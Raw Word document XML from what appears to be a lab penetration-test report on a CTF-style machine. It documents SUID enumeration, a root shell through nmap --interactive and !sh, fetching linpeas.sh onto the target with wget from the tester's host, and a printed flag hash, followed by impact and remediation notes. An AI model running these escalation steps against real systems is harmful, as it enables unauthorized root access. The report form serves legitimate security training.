          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="421DEAF5">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BAC3EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58AB8D67">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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cript output showing vulnerable SUID binary or misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD5E0E0">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cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/local/bin  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009A19CC">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ls -la</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F4349C">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 ls -l nmap                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A358E1D">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 find / -perm -4000 -type f 2&gt;/dev/null                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262CD35B">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 /usr/local/bin/nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> was discovered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233309FC">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 xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">GTFOBINS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, click on SUID, scroll to nmap area and clicked on SHELL(SUID) then click SUID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C192D52">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copied</w:t>
      </w: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nmap --interactive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE1578C">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!sh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are all used to gained acess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEFF6EF">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Command output demonstrating successful privilege escalation (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> showing `uid=0(root)`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pwd, whoami</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B06AE59">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d /root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512E24FC">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lang w:val="en-US"/>
        </w:rPr>
        <w:t>cat key-3-of 3.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447D6347">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="5080" b="190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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5265420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A03BBED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>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 xml:space="preserve"> Another Step and Evidence of PE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFD9967">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left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One way to identify vulnerabilities in the server is by using linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300A2151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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Go to google and download linpeas.sh to your kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E51BAD9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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Go to downloads on your kali(cd Downloads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301CDC57">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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Type chmod +x linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37416B02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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Ensured wget is install on the machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F6085A">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Run python3 server on the directory(Downloads) you have the linpeas.sh  downloaded earlier to start listening on port 80. Script used: python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FFEC13">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In ssh environment, establish connection from the target machine to the Kali Linux IP I.e the TUN0. Parameter: type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent5"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> wget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent5"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent5"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://192.168.214.215/linpeas.sh" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent5"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent5"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>http://192.168.214.215/linpeas.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent5"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B96909E">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Permission was denied, we can download get robot into directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235118D0">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Go to   temporary directory, here you wiil able to download linpeas.sh. Type, cd tmp, ls -la,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727F59A9">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Type wget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://192.168.178.236/linpeas.sh" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>192.168.178.236/linpeas.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6162D4B9">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c</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hmod +x linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B36C5C">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ls -la, clear.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6974DAC0">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./linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA6CF94">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After running the linpeas.sh, inside tool there is “file with interesting permission such as;/usr/local/bin/nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77886F76">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For SUID type, “find / -perm -u=s -type f 2&gt;/dev/null”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F2404D">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Type ls, ls -la, and ls -la /usr/local/bin. Nmap file is discovered which is not common to have in linux server and the owner is root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605D0574">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Go to GTFOBINS, click on SUID, and check for nmap by scrolling down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6010DE">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Click on shell(SUID), then click SUID on a. copy the code to gain root privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19973705">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First copy the first line </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap --interactive and then modify the second line to !sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5EF00F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Type ls -la, cd /root, ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547BE5A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cat key-3-of-3.txt        result:04787ddef27c3dee1ee161b21670b4e4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A56C076">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A8CC9B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F976D4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F64FD7D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBA1F4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Screen shoot of linpeas.sh method of PE </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="5080" b="190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19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5265420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D1AC3C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="5080" b="190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20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5265420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AA9076">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1905"/>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21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5265420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D58EAE2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="409A5D7E">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3372A666">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D2C1119">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Full system compromise. An attacker with root access can read, modify, or delete any data, install backdoors, and pivot to other systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE75341">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70CBD4D6">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>High-Level Remediation Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30001B53">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09BD3CF6">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Remove or restrict unnecessary SUID/SGID binaries  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0520409A">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 xml:space="preserve">Keep system packages and applications up to date  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D0F378">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
